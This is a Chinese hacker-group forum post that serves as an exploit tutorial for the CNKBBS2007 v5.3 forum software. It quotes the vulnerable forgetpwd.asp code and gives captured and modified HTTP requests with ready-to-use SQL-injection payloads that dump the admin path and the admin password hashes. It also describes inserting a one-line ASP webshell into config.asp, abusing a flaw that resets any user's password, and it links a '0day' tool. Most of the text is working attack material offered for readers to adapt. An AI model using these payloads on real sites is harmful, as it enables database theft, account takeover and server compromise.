【华夏黑客联盟网络精英小组】先来看源码：
forgetpwd.asp ——CNKBBS2007 v5.3
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!--#include file="opendb.asp" -->
<!--#include file="md5.asp" -->
<%
Conn.execute("delete from Cnk_Record where riqi<>'"&date()&"'")
Dim action,chkusername,chkpwdanswer,chkpwd,chkpassword,pwd_question,pwd_answer
action=Request("action")
chkusername=Trim(Request.Form("chkusername"))     
chkpwdanswer=Trim(Request.Form("chkpwdanswer")) 
chkpassword=trim(request("password"))
pwd_question=Trim(Request.Form("pwd_question"))
pwd_answer=Trim(Request.Form("pwd_answer"))

thistitle="用户找回密码"
Call Showhead()
%>
<div class="CnkBox">
<div class="CnkBoxTitle"><strong>找回密码</strong></div>
<div id="list"> <br />
  <% Select Case action
Case "" %>
  <script>
<!--
function signin() {
validity=true;

if (!check_empty(document.fgform.chkusername.value) || (document.fgform.chkusername.value=="用户名"))
{ validity=false;
alert('请输入用户名!');
document.fgform.chkusername.focus();
return validity; }

  <form name="fgform" method="post" action="" onSubmit="return signin();">
    <ul>
    <li class="t1">输入您的登录名：</li>
    <li class="t2">
      <input name="chkusername" type="text" class="input" id="chkusername" onFocus="if (this.value=='用户名') this.value='';" value="用户名" maxlength="20">
    </li>
    </ul>
    <br />
    <br />
    <ul>
    <li class="t1">
      <input name="action" type="hidden" id="action" value="1">
    </li>
    <li class="t2">
      <input type="button" name="Submit22" value="<<上一步" class="button" onClick="history.go(-1)">
      <input type="submit" name="Submit2" value="下一步>>" class="button">
    </li>
    </ul>
    <br />
    <br />
    <br />
  </form>
  <% Case "1"
  rs.open "select question from cnk_users where username='"&chkusername&"'",conn,1,3    if rs.recordcount=0 then
  Call alertmsg("不存在的用户名！")
    rs.close
  else
%>
注意这两句: chkusername=Trim(Request.Form("chkusername"))
            rs.open "select question from cnk_users where username='"&chkusername&"'",conn,1,3 
可以很清楚地看到，chkusername没过滤就直接拿到SQL里去查.注入漏洞就这样出来了.
不过还有个小问题,就是这句:
<input name="chkusername" type="text" class="input" id="chkusername" onFocus="if (this.value=='用户名') this.value='';" value="用户名" maxlength="20">
这句对输入用户名的长度进行了限制,只有20的字符,我们的注入语句肯定比20长.不过绕过的方法也很简单,用NC提交就OK了
  好,现在在本地架设IIS开始测试,首先按首页的忘记密码,出来找回密码的页面,随便输入,用WSE抓包.
报文如下:
POST /forgetpwd.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
Referer: http://127.0.0.1/forgetpwd.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; TencentTraveler )
Host: 127.0.0.1
Content-Length: 59
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:ASPSESSIONIDSSAQARQC=KLHPDKCDIEBGFDCHDIOMNNIH;cnkbbs=onlineid=12700160

chkusername=12312&action=1&Submit2=%CF%C2%D2%BB%B2%BD%3E%3E

现在构造注入语句.
查询语句"select question from cnk_users where username='"&chkusername&"'"当我们的chkusername的值为tox0’ and 1=2 union select UserPassword from Cnk_Users whene UserName=’admin.那么放到查询语句中就是:select question from cnk_users where username=tox0’ and 1=2 union select UserPassword from Cnk_Users whene UserName=’admin’
这样就可以爆密码了.当然,这里注入语句可以构造的灵活一点.where 的条件不一定是要UserName=’admin’,也可以是UserId=1,或者是AdminRight= 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 不过要记住,要闭合后面的单引号.
修改一下报文：
POST /forgetpwd.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
Referer: http://127.0.0.1/forgetpwd.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; TencentTraveler )
Host: 127.0.0.1
Content-Length: 138
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:ASPSESSIONIDSSAQARQC=KLHPDKCDIEBGFDCHDIOMNNIH;cnkbbs=onlineid=12700160

chkusername=tox0%27+and+1%3D2+union+select+userpassword+from+Cnk_Users+where+UserName%3D%27admin&action=1&Submit2=%CF%C2%D2%BB%B2%BD%3E%3E

用nc提交.成功~~在密码问题处爆了前台管理员密码散列.
由于中网景论坛的前台管理员与后台管理员不在一个表里,密码有可能不一样,所以还要再爆他后台的散列.放后台管理员的表是Cnk_Admin,列名有AdminName, AdminID, AdminPassword, AdminRight,一个拥有所有权限的管理员的AdminRight的值是1, 2, 3, 4, 5, 10, 11, 12, 14, 15, 16, 20, 21, 22, 23, 24, 25, 26, 27, 28, 30, 34, 31, 32, 33, 40, 41, 42, 43, 44, 50, 51, 60, 61, 70, 71 至于怎么构造注入语句,这里就不多说了.
OK~~假设一切顺利,拿到了破解后的密码(如果不能破解,后面还有别的办法)现在进入后台,目标WEBSHELL.
拿shell的思路是插一句话,插一句话的地方是config.asp.修改论坛名称为:原来的名称"%><%execute request("value")%><%rem.比如原来名称是tox0,那就改为tox0"%><%execute request("value")%><%rem 用一句话木马连接,上传webshell.上传成功后还要再改回来.至于拿到shell之后的事情,那就随你了...

现在把几个注入语句给大家,大家可以自己修改着用:
chkusername=tox0%27+and+1%3D2+union+select+adminpath+from+Cnk_Setup+where+%271%27%3D%271&action=1&Submit2=%CF%C2%D2%BB%B2%BD%3E%3E   
(Content-Length: 130——爆后台管理路径)

chkusername=tox0%27+and+1%3D2+union+select+userpassword+from+Cnk_Users+where+UserName%3D%27admin&action=1&Submit2=%CF%C2%D2%BB%B2%BD%3E%3E (Content-Length: 138——爆前台密码散列    )

chkusername=tox0%27+and+1%3D2+union+select+adminpassword+from+Cnk_Admin+where+AdminName%3D%27admin&action=1&Submit2=%CF%C2%D2%BB%B2%BD%3E%3E (Content-Length: 140——爆后台密码散列)

现在说说第二个漏洞.漏洞文件还是在forgetpwd.asp,这个漏洞允许修改任何用户的密码.所以在破解不了MD5的情况下可以用这种办法.再看源码:
  <form name="form1" method="post" action="" onSubmit="return signin();">
    <ul>
    <li class="t1">设置新密码：</li>
    <li class="t2"><input name="password" type="password" class="input" id="password" maxlength="20">
      6-20字符</li>
    </ul>
    <ul>
    <li class="t1">确认新密码：</li>
    <li class="t2">
      <input name="password2" type="password" class="input" id="password2" maxlength="20">
      6-20字符</li>
    </ul>
    <ul>
    <li class="t1">设置新问题：</li>
    <li class="t2">
      <input name="pwd_question" type="text" class="input" id="pwd_question" maxlength="20">
      不改请留空</li>
    </ul>
    <ul>
    <li class="t1">设置新答案：</li>
    <li class="t2">
      <input name="pwd_answer" type="text" class="input" id="pwd_answer" maxlength="20">
      不改请留空</li>
    </ul>
    <br />
    <br />
    <ul>
    <li class="t1">
      <input name="action" type="hidden" id="action" value="3">
      <input name="chkusername" type="hidden" id="chkusername" value="<%= chkusername %>">
    </li>
    <li class="t2">
      <input type="button" name="Submit22" value="<<上一步" class="button" onClick="history.go(-1)">
      <input type="submit" name="Submit" value="下一步>>" class="button">
    </li>
    </ul>
  </form>
  <% End If %>
<% Select Case action
Case "3"
rs.open "select UserPassword,question,answer from cnk_users where username='"&chkusername&"'",conn,1,3
rs("UserPassword")=MD5(chkpassword)
if pwd_question<>"" then rs("question")=pwd_question
if pwd_answer<>"" then rs("answer")=MD5(pwd_answer)
rs.update
rs.Close
set rs=nothing
%>
注意这两句:
<input name="chkusername" type="hidden" id="chkusername" value="<%= chkusername %>">
rs.open "select UserPassword,question,answer from cnk_users where username='"&chkusername&"'",conn,1,3
第一句就是说在修改密码的页面存在一个隐藏变量,id是username,值是之前输入的用户名.第二句是说修改username为chkusername这个变量的值的用户的密码.而上面说过chkusername的值是Request.Form("chkusername") .
而这个forgetpwd.asp中没有对chkusername是否为当前用户进行任何判断,也没有检测是否从外部提交.所以,我们只要构造一个,修改chkusername的值,就可以达到修改任何用户密码的目的(仅仅可以修改前台密码)
工具下载地址:http://tox0.88y.net/SOFT/cnkbbs%200day.exe



pS:看源码时还发现他那个上传地方有问题：上传路径可以修改,很像以前利用动网6.0的那个上传漏洞,可是本地测试了N次,都没有成功,不知道为什么.有兴趣的朋友情可以去研究研究~~